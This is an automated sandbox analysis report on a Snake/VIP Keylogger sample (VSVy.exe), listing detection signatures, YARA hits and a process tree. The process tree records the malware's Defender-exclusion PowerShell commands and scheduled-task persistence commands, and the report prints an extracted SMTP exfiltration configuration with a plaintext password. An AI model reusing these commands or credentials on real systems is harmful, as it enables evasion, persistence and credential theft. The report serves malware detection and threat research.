Edit tour

Windows Analysis Report
VSVy.exe

Overview

General Information

Sample name:	VSVy.exe
Analysis ID:	1618710
MD5:	b2ab62452cfdf6fa8398f51668ae73e9
SHA1:	b23a3d5637b131d06ef915f9468e21e9b9432819
SHA256:	d4e7b1bcebd9b9150dc206559b929744b9b592d3d62baa7902f3979b60336177
Tags:	exeuser-Bastian455_
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

VSVy.exe (PID: 764 cmdline: "C:\Users\user\Desktop\VSVy.exe" MD5: B2AB62452CFDF6FA8398F51668AE73E9)

powershell.exe (PID: 3560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJfOOh.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 1252 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6768 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

VSVy.exe (PID: 6208 cmdline: "C:\Users\user\Desktop\VSVy.exe" MD5: B2AB62452CFDF6FA8398F51668AE73E9)

gJfOOh.exe (PID: 4160 cmdline: C:\Users\user\AppData\Roaming\gJfOOh.exe MD5: B2AB62452CFDF6FA8398F51668AE73E9)

schtasks.exe (PID: 1120 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

gJfOOh.exe (PID: 4292 cmdline: "C:\Users\user\AppData\Roaming\gJfOOh.exe" MD5: B2AB62452CFDF6FA8398F51668AE73E9)

gJfOOh.exe (PID: 3228 cmdline: "C:\Users\user\AppData\Roaming\gJfOOh.exe" MD5: B2AB62452CFDF6FA8398F51668AE73E9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "contact@gemssystems.com", "Password": "Admin174C@GEMS_DRFgemsSA", "Host": "mail.gemssystems.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "contact@gemssystems.com", "Password": "Admin174C@GEMS_DRFgemsSA", "Host": "mail.gemssystems.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.3899379184.0000000000425000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb079:$a1: get_encryptedPassword 0xb3a2:$a2: get_encryptedUsername 0xae89:$a3: get_timePasswordChanged 0xaf92:$a4: get_passwordField 0xb08f:$a5: set_encryptedPassword 0xc767:$a7: get_logins 0xc6ca:$a10: KeyLoggerEventArgs 0xc32f:$a11: KeyLoggerEventArgsEventHandler
00000010.00000002.3899379679.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.3903689735.000000000304D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.3899379184.0000000000436000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3899379184.0000000000436000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x327e9:$a1: get_encryptedPassword 0x76609:$a1: get_encryptedPassword 0xba229:$a1: get_encryptedPassword 0x32b12:$a2: get_encryptedUsername 0x76932:$a2: get_encryptedUsername 0xba552:$a2: get_encryptedUsername 0x325f9:$a3: get_timePasswordChanged 0x76419:$a3: get_timePasswordChanged 0xba039:$a3: get_timePasswordChanged 0x32702:$a4: get_passwordField 0x76522:$a4: get_passwordField 0xba142:$a4: get_passwordField 0x327ff:$a5: set_encryptedPassword 0x7661f:$a5: set_encryptedPassword 0xba23f:$a5: set_encryptedPassword 0x33ed7:$a7: get_logins 0x77cf7:$a7: get_logins 0xbb917:$a7: get_logins 0x33e3a:$a10: KeyLoggerEventArgs 0x77c5a:$a10: KeyLoggerEventArgs 0xbb87a:$a10: KeyLoggerEventArgs
00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x38cab9:$a1: get_encryptedPassword 0x3d08d9:$a1: get_encryptedPassword 0x4144f9:$a1: get_encryptedPassword 0x38cde2:$a2: get_encryptedUsername 0x3d0c02:$a2: get_encryptedUsername 0x414822:$a2: get_encryptedUsername 0x38c8c9:$a3: get_timePasswordChanged 0x3d06e9:$a3: get_timePasswordChanged 0x414309:$a3: get_timePasswordChanged 0x38c9d2:$a4: get_passwordField 0x3d07f2:$a4: get_passwordField 0x414412:$a4: get_passwordField 0x38cacf:$a5: set_encryptedPassword 0x3d08ef:$a5: set_encryptedPassword 0x41450f:$a5: set_encryptedPassword 0x38e1a7:$a7: get_logins 0x3d1fc7:$a7: get_logins 0x415be7:$a7: get_logins 0x38e10a:$a10: KeyLoggerEventArgs 0x3d1f2a:$a10: KeyLoggerEventArgs 0x415b4a:$a10: KeyLoggerEventArgs
Process Memory Space: VSVy.exe PID: 764	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: VSVy.exe PID: 764	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: VSVy.exe PID: 764	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: VSVy.exe PID: 764	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: VSVy.exe PID: 764	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xa1745:$a1: get_encryptedPassword 0xa1961:$a2: get_encryptedUsername 0xa157f:$a3: get_timePasswordChanged 0xa166f:$a4: get_passwordField 0xa175b:$a5: set_encryptedPassword 0xa3601:$a7: get_logins 0xa3579:$a10: KeyLoggerEventArgs 0xa3327:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: VSVy.exe PID: 6208	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: VSVy.exe PID: 6208	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: VSVy.exe PID: 6208	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xae2c7:$a1: get_encryptedPassword 0xae5e6:$a2: get_encryptedUsername 0xae0e1:$a3: get_timePasswordChanged 0xae1ea:$a4: get_passwordField 0xae2dd:$a5: set_encryptedPassword 0xb07ba:$a7: get_logins 0xb071d:$a10: KeyLoggerEventArgs 0xb0386:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: gJfOOh.exe PID: 4160	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: gJfOOh.exe PID: 4160	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: gJfOOh.exe PID: 4160	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: gJfOOh.exe PID: 4160	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: gJfOOh.exe PID: 4160	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x793d0:$a1: get_encryptedPassword 0x796ef:$a2: get_encryptedUsername 0x791ea:$a3: get_timePasswordChanged 0x792f3:$a4: get_passwordField 0x793e6:$a5: set_encryptedPassword 0x7b8c3:$a7: get_logins 0x7b826:$a10: KeyLoggerEventArgs 0x7b48f:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: gJfOOh.exe PID: 3228	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: gJfOOh.exe PID: 3228	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: gJfOOh.exe PID: 3228	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.VSVy.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.VSVy.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.VSVy.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e279:$a1: get_encryptedPassword 0x2e5a2:$a2: get_encryptedUsername 0x2e089:$a3: get_timePasswordChanged 0x2e192:$a4: get_passwordField 0x2e28f:$a5: set_encryptedPassword 0x2f967:$a7: get_logins 0x2f8ca:$a10: KeyLoggerEventArgs 0x2f52f:$a11: KeyLoggerEventArgsEventHandler
10.2.VSVy.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c108:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b7ab:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ba08:$a4: \Orbitum\User Data\Default\Login Data 0x3c3e7:$a5: \Kometa\User Data\Default\Login Data
10.2.VSVy.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ee87:$s1: UnHook 0x2ee8e:$s2: SetHook 0x2ee96:$s3: CallNextHook 0x2eea3:$s4: _hook
11.2.gJfOOh.exe.3999390.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.gJfOOh.exe.3999390.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.gJfOOh.exe.3999390.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.gJfOOh.exe.3955570.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.gJfOOh.exe.3955570.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.gJfOOh.exe.3955570.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.gJfOOh.exe.3999390.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c479:$a1: get_encryptedPassword 0x2c7a2:$a2: get_encryptedUsername 0x2c289:$a3: get_timePasswordChanged 0x2c392:$a4: get_passwordField 0x2c48f:$a5: set_encryptedPassword 0x2db67:$a7: get_logins 0x2daca:$a10: KeyLoggerEventArgs 0x2d72f:$a11: KeyLoggerEventArgsEventHandler
11.2.gJfOOh.exe.3955570.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c479:$a1: get_encryptedPassword 0x2c7a2:$a2: get_encryptedUsername 0x2c289:$a3: get_timePasswordChanged 0x2c392:$a4: get_passwordField 0x2c48f:$a5: set_encryptedPassword 0x2db67:$a7: get_logins 0x2daca:$a10: KeyLoggerEventArgs 0x2d72f:$a11: KeyLoggerEventArgsEventHandler
11.2.gJfOOh.exe.3999390.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a308:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x399ab:$a3: \Google\Chrome\User Data\Default\Login Data 0x39c08:$a4: \Orbitum\User Data\Default\Login Data 0x3a5e7:$a5: \Kometa\User Data\Default\Login Data
11.2.gJfOOh.exe.3955570.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a308:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x399ab:$a3: \Google\Chrome\User Data\Default\Login Data 0x39c08:$a4: \Orbitum\User Data\Default\Login Data 0x3a5e7:$a5: \Kometa\User Data\Default\Login Data
11.2.gJfOOh.exe.3999390.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d087:$s1: UnHook 0x2d08e:$s2: SetHook 0x2d096:$s3: CallNextHook 0x2d0a3:$s4: _hook
11.2.gJfOOh.exe.3955570.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d087:$s1: UnHook 0x2d08e:$s2: SetHook 0x2d096:$s3: CallNextHook 0x2d0a3:$s4: _hook
11.2.gJfOOh.exe.3999390.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.gJfOOh.exe.3999390.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.gJfOOh.exe.3999390.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.gJfOOh.exe.3999390.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e279:$a1: get_encryptedPassword 0x71e99:$a1: get_encryptedPassword 0x2e5a2:$a2: get_encryptedUsername 0x721c2:$a2: get_encryptedUsername 0x2e089:$a3: get_timePasswordChanged 0x71ca9:$a3: get_timePasswordChanged 0x2e192:$a4: get_passwordField 0x71db2:$a4: get_passwordField 0x2e28f:$a5: set_encryptedPassword 0x71eaf:$a5: set_encryptedPassword 0x2f967:$a7: get_logins 0x73587:$a7: get_logins 0x2f8ca:$a10: KeyLoggerEventArgs 0x734ea:$a10: KeyLoggerEventArgs 0x2f52f:$a11: KeyLoggerEventArgsEventHandler 0x7314f:$a11: KeyLoggerEventArgsEventHandler
11.2.gJfOOh.exe.3999390.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c108:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fd28:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b7ab:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f3cb:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ba08:$a4: \Orbitum\User Data\Default\Login Data 0x7f628:$a4: \Orbitum\User Data\Default\Login Data 0x3c3e7:$a5: \Kometa\User Data\Default\Login Data 0x80007:$a5: \Kometa\User Data\Default\Login Data
11.2.gJfOOh.exe.3999390.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ee87:$s1: UnHook 0x72aa7:$s1: UnHook 0x2ee8e:$s2: SetHook 0x72aae:$s2: SetHook 0x2ee96:$s3: CallNextHook 0x72ab6:$s3: CallNextHook 0x2eea3:$s4: _hook 0x72ac3:$s4: _hook
0.2.VSVy.exe.447b420.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VSVy.exe.447b420.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.VSVy.exe.447b420.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.VSVy.exe.447b420.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb6699:$a1: get_encryptedPassword 0xfa4b9:$a1: get_encryptedPassword 0x13e0d9:$a1: get_encryptedPassword 0xb69c2:$a2: get_encryptedUsername 0xfa7e2:$a2: get_encryptedUsername 0x13e402:$a2: get_encryptedUsername 0xb64a9:$a3: get_timePasswordChanged 0xfa2c9:$a3: get_timePasswordChanged 0x13dee9:$a3: get_timePasswordChanged 0xb65b2:$a4: get_passwordField 0xfa3d2:$a4: get_passwordField 0x13dff2:$a4: get_passwordField 0xb66af:$a5: set_encryptedPassword 0xfa4cf:$a5: set_encryptedPassword 0x13e0ef:$a5: set_encryptedPassword 0xb7d87:$a7: get_logins 0xfbba7:$a7: get_logins 0x13f7c7:$a7: get_logins 0xb7cea:$a10: KeyLoggerEventArgs 0xfbb0a:$a10: KeyLoggerEventArgs 0x13f72a:$a10: KeyLoggerEventArgs
0.2.VSVy.exe.447b420.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb72a7:$s1: UnHook 0xfb0c7:$s1: UnHook 0x13ece7:$s1: UnHook 0xb72ae:$s2: SetHook 0xfb0ce:$s2: SetHook 0x13ecee:$s2: SetHook 0xb72b6:$s3: CallNextHook 0xfb0d6:$s3: CallNextHook 0x13ecf6:$s3: CallNextHook 0xb72c3:$s4: _hook 0xfb0e3:$s4: _hook 0x13ed03:$s4: _hook
11.2.gJfOOh.exe.3955570.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.gJfOOh.exe.3955570.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.gJfOOh.exe.3955570.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.gJfOOh.exe.3955570.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e279:$a1: get_encryptedPassword 0x72099:$a1: get_encryptedPassword 0xb5cb9:$a1: get_encryptedPassword 0x2e5a2:$a2: get_encryptedUsername 0x723c2:$a2: get_encryptedUsername 0xb5fe2:$a2: get_encryptedUsername 0x2e089:$a3: get_timePasswordChanged 0x71ea9:$a3: get_timePasswordChanged 0xb5ac9:$a3: get_timePasswordChanged 0x2e192:$a4: get_passwordField 0x71fb2:$a4: get_passwordField 0xb5bd2:$a4: get_passwordField 0x2e28f:$a5: set_encryptedPassword 0x720af:$a5: set_encryptedPassword 0xb5ccf:$a5: set_encryptedPassword 0x2f967:$a7: get_logins 0x73787:$a7: get_logins 0xb73a7:$a7: get_logins 0x2f8ca:$a10: KeyLoggerEventArgs 0x736ea:$a10: KeyLoggerEventArgs 0xb730a:$a10: KeyLoggerEventArgs
11.2.gJfOOh.exe.3955570.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ee87:$s1: UnHook 0x72ca7:$s1: UnHook 0xb68c7:$s1: UnHook 0x2ee8e:$s2: SetHook 0x72cae:$s2: SetHook 0xb68ce:$s2: SetHook 0x2ee96:$s3: CallNextHook 0x72cb6:$s3: CallNextHook 0xb68d6:$s3: CallNextHook 0x2eea3:$s4: _hook 0x72cc3:$s4: _hook 0xb68e3:$s4: _hook
0.2.VSVy.exe.43f3000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VSVy.exe.43f3000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.VSVy.exe.43f3000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.VSVy.exe.43f3000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13eab9:$a1: get_encryptedPassword 0x1828d9:$a1: get_encryptedPassword 0x1c64f9:$a1: get_encryptedPassword 0x13ede2:$a2: get_encryptedUsername 0x182c02:$a2: get_encryptedUsername 0x1c6822:$a2: get_encryptedUsername 0x13e8c9:$a3: get_timePasswordChanged 0x1826e9:$a3: get_timePasswordChanged 0x1c6309:$a3: get_timePasswordChanged 0x13e9d2:$a4: get_passwordField 0x1827f2:$a4: get_passwordField 0x1c6412:$a4: get_passwordField 0x13eacf:$a5: set_encryptedPassword 0x1828ef:$a5: set_encryptedPassword 0x1c650f:$a5: set_encryptedPassword 0x1401a7:$a7: get_logins 0x183fc7:$a7: get_logins 0x1c7be7:$a7: get_logins 0x14010a:$a10: KeyLoggerEventArgs 0x183f2a:$a10: KeyLoggerEventArgs 0x1c7b4a:$a10: KeyLoggerEventArgs
0.2.VSVy.exe.43f3000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13f6c7:$s1: UnHook 0x1834e7:$s1: UnHook 0x1c7107:$s1: UnHook 0x13f6ce:$s2: SetHook 0x1834ee:$s2: SetHook 0x1c710e:$s2: SetHook 0x13f6d6:$s3: CallNextHook 0x1834f6:$s3: CallNextHook 0x1c7116:$s3: CallNextHook 0x13f6e3:$s4: _hook 0x183503:$s4: _hook 0x1c7123:$s4: _hook
0.2.VSVy.exe.41a5dc0.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VSVy.exe.41a5dc0.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.VSVy.exe.41a5dc0.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.VSVy.exe.41a5dc0.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x38bcf9:$a1: get_encryptedPassword 0x3cfb19:$a1: get_encryptedPassword 0x413739:$a1: get_encryptedPassword 0x38c022:$a2: get_encryptedUsername 0x3cfe42:$a2: get_encryptedUsername 0x413a62:$a2: get_encryptedUsername 0x38bb09:$a3: get_timePasswordChanged 0x3cf929:$a3: get_timePasswordChanged 0x413549:$a3: get_timePasswordChanged 0x38bc12:$a4: get_passwordField 0x3cfa32:$a4: get_passwordField 0x413652:$a4: get_passwordField 0x38bd0f:$a5: set_encryptedPassword 0x3cfb2f:$a5: set_encryptedPassword 0x41374f:$a5: set_encryptedPassword 0x38d3e7:$a7: get_logins 0x3d1207:$a7: get_logins 0x414e27:$a7: get_logins 0x38d34a:$a10: KeyLoggerEventArgs 0x3d116a:$a10: KeyLoggerEventArgs 0x414d8a:$a10: KeyLoggerEventArgs
0.2.VSVy.exe.41a5dc0.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x38c907:$s1: UnHook 0x3d0727:$s1: UnHook 0x414347:$s1: UnHook 0x38c90e:$s2: SetHook 0x3d072e:$s2: SetHook 0x41434e:$s2: SetHook 0x38c916:$s3: CallNextHook 0x3d0736:$s3: CallNextHook 0x414356:$s3: CallNextHook 0x38c923:$s4: _hook 0x3d0743:$s4: _hook 0x414363:$s4: _hook
Click to see the 38 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VSVy.exe", ParentImage: C:\Users\user\Desktop\VSVy.exe, ParentProcessId: 764, ParentProcessName: VSVy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe", ProcessId: 3560, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\gJfOOh.exe, ParentImage: C:\Users\user\AppData\Roaming\gJfOOh.exe, ParentProcessId: 4160, ParentProcessName: gJfOOh.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp", ProcessId: 1120, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

